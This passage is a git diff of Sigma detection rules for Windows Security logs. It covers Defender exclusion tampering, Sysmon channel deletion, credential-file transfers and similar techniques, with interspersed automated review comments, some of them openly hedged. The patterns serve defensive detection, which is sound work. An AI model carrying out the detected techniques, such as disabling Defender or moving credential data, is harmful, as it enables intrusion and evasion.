diff --git a/sigma/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml b/sigma/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml
index 475340f35..c2c71b8f3 100644
--- a/sigma/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml
+++ b/sigma/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml
@@ -1,15 +1,14 @@
title: Important Scheduled Task Deleted/Disabled
id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad
related:
- - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78
- type: similar
- - id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980
- type: similar
- - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d
- type: similar
+ - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 # ProcCreation schtasks delete
+ type: similar
+ - id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 # ProcCreation schtasks disable
+ type: similar
+ - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog
+ type: similar
status: experimental
-description: Detects when adversaries stop services or processes by deleting or disabling
- their respective scheduled tasks in order to conduct data destructive activities
+description: Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
references:
- https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699
- https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701
@@ -24,17 +23,16 @@ tags:
logsource:
product: windows
service: security
- definition: The Advanced Audit Policy setting Object Access > Audit Other Object
- Access Events has to be configured to allow this detection. We also recommend
- extracting the Command field from the embedded XML in the event data.
+ definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.
detection:
security:
Channel: Security
selection:
EventID:
- - 4699
- - 4701
+ - 4699 # Task Deleted Event
+ - 4701 # Task Disabled Event
TaskName|contains:
+ # Add more important tasks
- \Windows\SystemRestore\SR
- \Windows\Windows Defender\
- \Windows\BitLocker
@@ -44,7 +42,7 @@ detection:
- \Windows\ExploitGuard
filter_sys_username:
EventID: 4699
- SubjectUserName|endswith: $
+ SubjectUserName|endswith: $ # False positives during upgrades of Defender, where its tasks get removed and added
TaskName|contains: \Windows\Windows Defender\
condition: security and (selection and not 1 of filter_*)
falsepositives:
diff --git a/sigma/builtin/security/win_security_susp_scheduled_task_update.yml b/sigma/builtin/security/win_security_susp_scheduled_task_update.yml
index 700fbea63..7f9c5e1ac 100644
--- a/sigma/builtin/security/win_security_susp_scheduled_task_update.yml
+++ b/sigma/builtin/security/win_security_susp_scheduled_task_update.yml
@@ -1,8 +1,8 @@
title: Suspicious Scheduled Task Update
id: 614cf376-6651-47c4-9dcc-6b9527f749f4
related:
- - id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b
- type: similar
+ - id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b # ProcCreation schtasks change
+ type: similar
status: test
description: Detects update to a scheduled task event that contain suspicious keywords.
references:
@@ -17,9 +17,7 @@ tags:
logsource:
product: windows
service: security
- definition: The Advanced Audit Policy setting Object Access > Audit Other Object
- Access Events has to be configured to allow this detection. We also recommend
- extracting the Command field from the embedded XML in the event data.
+ definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.
detection:
security:
Channel: Security
diff --git a/sigma/builtin/security/win_security_susp_time_modification.yml b/sigma/builtin/security/win_security_susp_time_modification.yml
index 3b9a3b3c1..1f4bd35c5 100644
--- a/sigma/builtin/security/win_security_susp_time_modification.yml
+++ b/sigma/builtin/security/win_security_susp_time_modification.yml
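Review bot: The new comment on `filter_sys_username` in the first hunk (`@@ -44,7 +42,7`) names the Defender-upgrade false positive but not the breadth of the exemption: `SubjectUserName|endswith: $` matches any account name ending in `$`, i.e. every machine account, for all 4699 deletions of tasks under `\Windows\Windows Defender\`. I would record that scope in the same comment, e.g. `# False positives during upgrades of Defender, where its tasks get removed and added (matches every machine account, not a specific one)`, so whoever tunes this rule knows the filter is account-class wide rather than tied to the upgrade case. The `detection:` block this filter belongs to starts before the hunk.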
@@ -1,8 +1,7 @@
title: Unauthorized System Time Modification
id: faa031b5-21ed-4e02-8881-2591f98d82ed
status: test
-description: Detect scenarios where a potentially unauthorized application or user
- is modifying the system time.
+description: Detect scenarios where a potentially unauthorized application or user is modifying the system time.
references:
- Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)
- Live environment caused by malware
@@ -16,9 +15,7 @@ tags:
logsource:
product: windows
service: security
- definition: 'Requirements: Audit Policy : System > Audit Security State Change,
- Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced
- Audit Policy Configuration\Audit Policies\System\Audit Security State Change'
+ definition: 'Requirements: Audit Policy : System > Audit Security State Change, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\System\Audit Security State Change'
detection:
security:
Channel: Security
@@ -34,7 +31,6 @@ detection:
SubjectUserSid: S-1-5-19
condition: security and (selection and not 1 of filter*)
falsepositives:
- - HyperV or other virtualization technologies with binary not listed in filter
- portion of detection
+ - HyperV or other virtualization technologies with binary not listed in filter portion of detection
level: low
ruletype: Sigma
diff --git a/sigma/builtin/security/win_security_svcctl_remote_service.yml b/sigma/builtin/security/win_security_svcctl_remote_service.yml
index 97ccb5daf..fb94eb1e3 100644
--- a/sigma/builtin/security/win_security_svcctl_remote_service.yml
+++ b/sigma/builtin/security/win_security_svcctl_remote_service.yml
@@ -1,8 +1,7 @@
title: Remote Service Activity via SVCCTL Named Pipe
id: 586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3
status: test
-description: Detects remote service activity via remote access to the svcctl named
- pipe
+description: Detects remote service activity via remote access to the svcctl named pipe
references:
- https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html
author: Samir Bousseaden
@@ -15,14 +14,13 @@ tags:
logsource:
product: windows
service: security
- definition: The advanced audit policy setting "Object Access > Audit Detailed
- File Share" must be configured for Success/Failure
+ definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure
detection:
security:
Channel: Security
selection:
EventID: 5145
- ShareName: \\\\\*\\IPC$
+ ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$
RelativeTargetName: svcctl
Accesses|contains: WriteData
condition: security and selection
diff --git a/sigma/builtin/security/win_security_syskey_registry_access.yml b/sigma/builtin/security/win_security_syskey_registry_access.yml
index 4a5b1eb7b..da7f1f56d 100644
--- a/sigma/builtin/security/win_security_syskey_registry_access.yml
+++ b/sigma/builtin/security/win_security_syskey_registry_access.yml
@@ -1,8 +1,7 @@
title: SysKey Registry Keys Access
id: 9a4ff3b8-6187-4fd2-8e8b-e0eae1129495
status: test
-description: Detects handle requests and access operations to specific registry keys
- to calculate the SysKey
+description: Detects handle requests and access operations to specific registry keys to calculate the SysKey
references:
- https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
diff --git a/sigma/builtin/security/win_security_sysmon_channel_reference_deletion.yml b/sigma/builtin/security/win_security_sysmon_channel_reference_deletion.yml
index 0484ca647..e96e1f6f2 100644
--- a/sigma/builtin/security/win_security_sysmon_channel_reference_deletion.yml
+++ b/sigma/builtin/security/win_security_sysmon_channel_reference_deletion.yml
@@ -1,8 +1,7 @@
title: Sysmon Channel Reference Deletion
id: 18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc
status: test
-description: Potential threat actor tampering with Sysmon manifest and eventually
- disabling it
+description: Potential threat actor tampering with Sysmon manifest and eventually disabling it
references:
- https://twitter.com/Flangvik/status/1283054508084473861
- https://twitter.com/SecurityJosh/status/1283027365770276866
@@ -32,7 +31,7 @@ detection:
ObjectName|contains:
- WINEVT\Publishers\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}
- WINEVT\Channels\Microsoft-Windows-Sysmon/Operational
- AccessMask: 65536
+ AccessMask: 0x10000
condition: security and (1 of selection*)
falsepositives:
- Unknown
diff --git a/sigma/builtin/security/win_security_tap_driver_installation.yml b/sigma/builtin/security/win_security_tap_driver_installation.yml
index abbd5d184..5401be925 100644
--- a/sigma/builtin/security/win_security_tap_driver_installation.yml
+++ b/sigma/builtin/security/win_security_tap_driver_installation.yml
@@ -1,11 +1,10 @@
title: Tap Driver Installation - Security
id: 9c8afa4d-0022-48f0-9456-3712466f9701
related:
- - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9
- type: derived
+ - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9
+ type: derived
status: test
-description: Well-known TAP software installation. Possible preparation for data exfiltration
- using tunnelling techniques
+description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques
author: Daniil Yugoslavskiy, Ian Davis, oscd.community
date: 2019/10/24
modified: 2022/11/29
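Review bot: `AccessMask: 0x10000` in the `@@ -32,7 +31,7` hunk of win_security_sysmon_channel_reference_deletion.yml is an unquoted scalar, so a YAML loader reads it as the integer 65536 — the very value the line replaces — and the rewrite only changes behaviour if the backend compares the raw token rather than the parsed value. Sibling rules in this commit write access masks as quoted strings (`'0x40'`, `'0x1400'` in the LSASS rule), which is presumably the form the event field is rendered in; for consistency and to avoid depending on loader type coercion I would write `AccessMask: '0x10000'`. The `selection*` block this line belongs to starts before the hunk.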
@@ -15,8 +14,7 @@ tags:
logsource:
product: windows
service: security
- definition: The 'System Security Extension' audit subcategory need to be enabled
- to log the EID 4697
+ definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697
detection:
security:
Channel: Security
diff --git a/sigma/builtin/security/win_security_teams_suspicious_objectaccess.yml b/sigma/builtin/security/win_security_teams_suspicious_objectaccess.yml
index 0f6515ab7..248c58bb6 100644
--- a/sigma/builtin/security/win_security_teams_suspicious_objectaccess.yml
+++ b/sigma/builtin/security/win_security_teams_suspicious_objectaccess.yml
@@ -1,8 +1,7 @@
title: Suspicious Teams Application Related ObjectAcess Event
id: 25cde13e-8e20-4c29-b949-4e795b76f16f
status: test
-description: Detects an access to authentication tokens and accounts of Microsoft
- Teams desktop application.
+description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
references:
- https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/
- https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
diff --git a/sigma/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml b/sigma/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml
index 264ba226b..33a4658f6 100644
--- a/sigma/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml
+++ b/sigma/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml
@@ -1,11 +1,10 @@
title: Transferring Files with Credential Data via Network Shares
id: 910ab938-668b-401b-b08c-b596e80fdca5
related:
- - id: 2e69f167-47b5-4ae7-a390-47764529eff5
- type: similar
+ - id: 2e69f167-47b5-4ae7-a390-47764529eff5
+ type: similar
status: test
-description: Transferring files with well-known filenames (sensitive files with credential
- data) using network shares
+description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
author: Teymur Kheirkhabarov, oscd.community
@@ -35,7 +34,6 @@ detection:
- \security
condition: security and selection
falsepositives:
- - Transferring sensitive files for legitimate administration work by legitimate
- administrator
+ - Transferring sensitive files for legitimate administration work by legitimate administrator
level: medium
ruletype: Sigma
diff --git a/sigma/builtin/security/win_security_user_added_to_local_administrators.yml b/sigma/builtin/security/win_security_user_added_to_local_administrators.yml
index 5b56a2d84..dc025bf74 100644
--- a/sigma/builtin/security/win_security_user_added_to_local_administrators.yml
+++ b/sigma/builtin/security/win_security_user_added_to_local_administrators.yml
@@ -1,8 +1,7 @@
title: User Added to Local Administrators
id: c265cf08-3f99-46c1-8d59-328247057d57
status: stable
-description: This rule triggers on user accounts that are added to the local Administrators
- group, which could be legitimate activity or a sign of privilege escalation activity
+description: This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity
author: Florian Roth (Nextron Systems)
date: 2017/03/14
modified: 2021/01/17
diff --git a/sigma/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml b/sigma/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml
index dd010e500..df6b6789e 100644
--- a/sigma/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml
+++ b/sigma/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml
@@ -1,9 +1,7 @@
title: User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'
id: 6daac7fc-77d1-449a-a71a-e6b4d59a0e54
status: test
-description: The 'LsaRegisterLogonProcess' function verifies that the application
- making the function call is a logon process by checking that it has the SeTcbPrivilege
- privilege set. Possible Rubeus tries to get a handle to LSA.
+description: The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.
references:
- https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
author: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community
@@ -22,7 +20,7 @@ detection:
selection:
EventID: 4673
Service: LsaRegisterLogonProcess()
- Keywords: '0x8010000000000000'
+ Keywords: '0x8010000000000000' # failure
condition: security and selection
falsepositives:
- Unknown
diff --git a/sigma/builtin/security/win_security_user_creation.yml b/sigma/builtin/security/win_security_user_creation.yml
index c7b5bcd08..dbda452cb 100644
--- a/sigma/builtin/security/win_security_user_creation.yml
+++ b/sigma/builtin/security/win_security_user_creation.yml
@@ -1,9 +1,7 @@
title: Local User Creation
id: 66b6be3d-55d0-4f47-9855-d69df21740ea
status: test
-description: Detects local user creation on Windows servers, which shouldn't happen
- in an Active Directory environment. Apply this Sigma Use Case on your Windows
- server logs and not on your DC logs.
+description: Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.
references:
- https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/
author: Patrick Bareiss
diff --git a/sigma/builtin/security/win_security_user_driver_loaded.yml b/sigma/builtin/security/win_security_user_driver_loaded.yml
index 0badb4aa7..b8247892f 100644
--- a/sigma/builtin/security/win_security_user_driver_loaded.yml
+++ b/sigma/builtin/security/win_security_user_driver_loaded.yml
@@ -1,22 +1,12 @@
title: Potential Privileged System Service Operation - SeLoadDriverPrivilege
id: f63508a0-c809-4435-b3be-ed819394d612
status: test
-description: 'Detects the usage of the ''SeLoadDriverPrivilege'' privilege. This privilege
- is required to load or unload a device driver.
-
- With this privilege, the user can dynamically load and unload device drivers or
- other code in to kernel mode.
-
+description: |
+ Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.
+ With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.
This user right does not apply to Plug and Play device drivers.
-
- If you exclude privileged users/admins and processes, which are allowed to do
- so, you are maybe left with bad programs trying to load malicious kernel drivers.
-
- This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs)
- and the usage of Sysinternals and various other tools. So you have to work with
- a whitelist to find the bad stuff.
-
- '
+ If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.
+ This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.
references:
- https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/
- https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673
@@ -60,9 +50,6 @@ detection:
ProcessName|startswith: C:\Program Files\WindowsApps\Microsoft
condition: security and (selection_1 and not 1 of filter_*)
falsepositives:
- - Other legimate tools loading drivers. Including but not limited to, Sysinternals,
- CPU-Z, AVs etc. A baseline needs to be created according to the used products
- and allowed tools. A good thing to do is to try and exclude users who are
- allowed to load drivers.
+ - Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers.
level: medium
ruletype: Sigma
diff --git a/sigma/builtin/security/win_security_user_logoff.yml b/sigma/builtin/security/win_security_user_logoff.yml
index fb266b7b0..7bda9c96f 100644
--- a/sigma/builtin/security/win_security_user_logoff.yml
+++ b/sigma/builtin/security/win_security_user_logoff.yml
@@ -1,8 +1,7 @@
title: User Logoff Event
id: 0badd08f-c6a3-4630-90d3-6875cca440be
status: test
-description: Detects a user log-off activity. Could be used for example to correlate
- information during forensic investigations
+description: Detects a user log-off activity. Could be used for example to correlate information during forensic investigations
references:
- https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md
- https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634
diff --git a/sigma/builtin/security/win_security_vssaudit_secevent_source_registration.yml b/sigma/builtin/security/win_security_vssaudit_secevent_source_registration.yml
index eaa288d4f..41280b53b 100644
--- a/sigma/builtin/security/win_security_vssaudit_secevent_source_registration.yml
+++ b/sigma/builtin/security/win_security_vssaudit_secevent_source_registration.yml
@@ -1,8 +1,7 @@
title: VSSAudit Security Event Source Registration
id: e9faba72-4974-4ab2-a4c5-46e25ad59e9b
status: test
-description: Detects the registration of the security event source VSSAudit. It would
- usually trigger when volume shadow copy operations happen.
+description: Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy
author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)
@@ -24,7 +23,6 @@ detection:
- 4905
condition: security and selection
falsepositives:
- - Legitimate use of VSSVC. Maybe backup operations. It would usually be done by
- C:\Windows\System32\VSSVC.exe.
+ - Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\Windows\System32\VSSVC.exe.
level: informational
ruletype: Sigma
diff --git a/sigma/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml b/sigma/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml
index ecd5dd183..ed286a643 100644
--- a/sigma/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml
+++ b/sigma/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml
@@ -1,16 +1,13 @@ title: Windows Defender Exclusion List Modified id: 46a68649-f218-4f86-aea1-16a759d81820 related: - - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d - type: derived - - id: a33f8808-2812-4373-ae95-8cfb82134978 - type: derived + - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d + type: derived + - id: a33f8808-2812-4373-ae95-8cfb82134978 + type: derived status: test -description: 'Detects modifications to the Windows Defender exclusion registry key. - This could indicate a potentially suspicious or even malicious activity by an - attacker trying to add a new exclusion in order to bypass security. - - ' +description: | + Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security. references: - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ author: '@BarryShooshooga' @@ -22,13 +19,12 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit - Policy, Registry System Access Control (SACL): Auditing/User' + definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User' detection: security: Channel: Security selection: - EventID: 4657 + EventID: 4657 # A registry value was modified. ObjectName|contains: \Microsoft\Windows Defender\Exclusions\ condition: security and selection falsepositives: diff --git a/sigma/builtin/security/win_security_windows_defender_exclusions_write_access.yml b/sigma/builtin/security/win_security_windows_defender_exclusions_write_access.yml index d93e39ab2..eb2c78fca 100644 --- a/sigma/builtin/security/win_security_windows_defender_exclusions_write_access.yml +++ b/sigma/builtin/security/win_security_windows_defender_exclusions_write_access.yml 
@@ -1,16 +1,13 @@ title: Windows Defender Exclusion Reigstry Key - Write Access Requested id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d related: - - id: 46a68649-f218-4f86-aea1-16a759d81820 - type: derived - - id: a33f8808-2812-4373-ae95-8cfb82134978 - type: derived + - id: 46a68649-f218-4f86-aea1-16a759d81820 + type: derived + - id: a33f8808-2812-4373-ae95-8cfb82134978 + type: derived status: test -description: 'Detects write access requests to the Windows Defender exclusions registry - keys. This could be an indication of an attacker trying to request a handle or - access the object to write new exclusions in order to bypass security. - - ' +description: | + Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security. references: - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ author: '@BarryShooshooga, Nasreddine Bencherchali (Nextron Systems)' @@ -22,18 +19,17 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit - Policy, Registry System Access Control (SACL): Auditing/User' + definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User' detection: security: Channel: Security selection: AccessList|contains: - - '%%4417' - - '%%4418' + - '%%4417' # WriteData + - '%%4418' # AppendData EventID: - - 4656 - - 4663 + - 4656 # A handle to an object was requested. + - 4663 # An attempt was made to access an object. ObjectName|contains: \Microsoft\Windows Defender\Exclusions\ condition: security and selection falsepositives: 
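Review bot: The new comments `# WriteData` and `# AppendData` on `%%4417`/`%%4418` give the file-system reading of those generic access-mask strings, but this rule only ever matches registry keys (`ObjectName|contains: \Microsoft\Windows Defender\Exclusions\`), where the same bits are KEY_SET_VALUE (0x2) and KEY_CREATE_SUB_KEY (0x4). An analyst triaging a hit will look for a "data write" that does not exist, so I would make the comments object-specific: `- '%%4417' # WriteData; on a registry key this bit is KEY_SET_VALUE` and `- '%%4418' # AppendData; on a registry key this bit is KEY_CREATE_SUB_KEY`. While the line is being touched, the title's `Reigstry` typo (a context line just above) could be fixed in the same pass.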
diff --git a/sigma/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml b/sigma/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml index 3a736c5c6..53d33b438 100644 --- a/sigma/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml +++ b/sigma/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml @@ -1,15 +1,13 @@ title: Windows Defender Exclusion Deleted id: a33f8808-2812-4373-ae95-8cfb82134978 related: - - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d - type: derived - - id: 46a68649-f218-4f86-aea1-16a759d81820 - type: derived + - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d + type: derived + - id: 46a68649-f218-4f86-aea1-16a759d81820 + type: derived status: test -description: 'Detects when a Windows Defender exclusion has been deleted. This could - indicate an attacker trying to delete their tracks by removing the added exclusions - - ' +description: | + Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions references: - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ author: '@BarryShooshooga' @@ -21,13 +19,12 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit - Policy, Registry System Access Control (SACL): Auditing/User' + definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User' detection: security: Channel: Security selection: - EventID: 4660 + EventID: 4660 # An object was deleted. ObjectName|contains: \Microsoft\Windows Defender\Exclusions\ condition: security and selection falsepositives: 
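Review bot: The comment `# An object was deleted.` added to `EventID: 4660` is correct, but as far as I recall 4660 carries only `ObjectServer`, `HandleId`, `ProcessId`/`ProcessName` and the subject — no `ObjectName` field — so the `ObjectName|contains` clause on the next line could never match and the rule would be dead on native 4660 events. Since the commit is annotating exactly that line, it should state the dependency rather than just the event name, e.g. `EventID: 4660 # An object was deleted. NOTE: 4660 has no ObjectName; the key path only exists in the 4656/4663 with the same HandleId - verify`. If that is confirmed, a registry-value deletion is better caught by 4657 with `OperationType` set to the "Registry value deleted" string (`%%1906`, if I have the table right), which does carry the value path, or by correlating on HandleId.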
diff --git a/sigma/builtin/security/win_security_wmi_persistence.yml b/sigma/builtin/security/win_security_wmi_persistence.yml index 0c3b76b15..08dd71a04 100644 --- a/sigma/builtin/security/win_security_wmi_persistence.yml +++ b/sigma/builtin/security/win_security_wmi_persistence.yml @@ -1,11 +1,10 @@ title: WMI Persistence - Security id: f033f3f3-fd24-4995-97d8-a3bb17550a88 related: - - id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b - type: derived + - id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b + type: derived status: test -description: Detects suspicious WMI event filter and command line event consumer based - on WMI and Security Logs. +description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. references: - https://twitter.com/mattifestation/status/899646620148539397 - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ diff --git a/sigma/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml b/sigma/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml index 8c6991879..b7923eaec 100644 --- a/sigma/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml +++ b/sigma/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml @@ -1,8 +1,7 @@ title: T1047 Wmiprvse Wbemcomn DLL Hijack id: f6c68d5f-e101-4b86-8c84-7d96851fd65c status: test -description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` - directory over the network for a WMI DLL Hijack scenario. +description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario. references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR) 
diff --git a/sigma/builtin/security/win_security_workstation_was_locked.yml b/sigma/builtin/security/win_security_workstation_was_locked.yml index d63469618..5a976fed5 100644 --- a/sigma/builtin/security/win_security_workstation_was_locked.yml +++ b/sigma/builtin/security/win_security_workstation_was_locked.yml @@ -1,8 +1,7 @@ title: Locked Workstation id: 411742ad-89b0-49cb-a7b0-3971b5c1e0a4 status: stable -description: Detects locked workstation session events that occur automatically after - a standard period of inactivity. +description: Detects locked workstation session events that occur automatically after a standard period of inactivity. references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf @@ -11,6 +10,30 @@ references: author: Alexandr Yampolskyi, SOC Prime date: 2019/03/26 modified: 2023/12/11 +# tags: + # - CSC16 + # - CSC16.11 + # - ISO27002-2013 A.9.1.1 + # - ISO27002-2013 A.9.2.1 + # - ISO27002-2013 A.9.2.2 + # - ISO27002-2013 A.9.2.3 + # - ISO27002-2013 A.9.2.4 + # - ISO27002-2013 A.9.2.5 + # - ISO27002-2013 A.9.2.6 + # - ISO27002-2013 A.9.3.1 + # - ISO27002-2013 A.9.4.1 + # - ISO27002-2013 A.9.4.3 + # - ISO27002-2013 A.11.2.8 + # - PCI DSS 3.1 7.1 + # - PCI DSS 3.1 7.2 + # - PCI DSS 3.1 7.3 + # - PCI DSS 3.1 8.7 + # - PCI DSS 3.1 8.8 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.PT-3 logsource: product: windows service: security diff --git a/sigma/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml b/sigma/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml index c044efc73..4e5d7d52a 100644 --- a/sigma/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml +++ b/sigma/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml 
@@ -1,9 +1,7 @@ title: Microsoft Defender Blocked from Loading Unsigned DLL id: 0b0ea3cc-99c8-4730-9c53-45deee2a4c86 status: test -description: Detects Code Integrity (CI) engine blocking Microsoft Defender's processes - (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload - arbitrary DLL +description: Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj @@ -21,7 +19,7 @@ detection: selection: EventID: - 11 - - 12 + - 12 # MDE: ExploitGuardNonMicrosoftSignedBlocked ProcessPath|endswith: - \MpCmdRun.exe - \NisSrv.exe diff --git a/sigma/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml b/sigma/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml index bc68a23ad..2e3edbb2e 100644 --- a/sigma/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml +++ b/sigma/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml @@ -1,8 +1,7 @@ title: Unsigned Binary Loaded From Suspicious Location id: 8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10 status: test -description: Detects Code Integrity (CI) engine blocking processes from loading unsigned - DLLs residing in suspicious locations +description: Detects Code Integrity 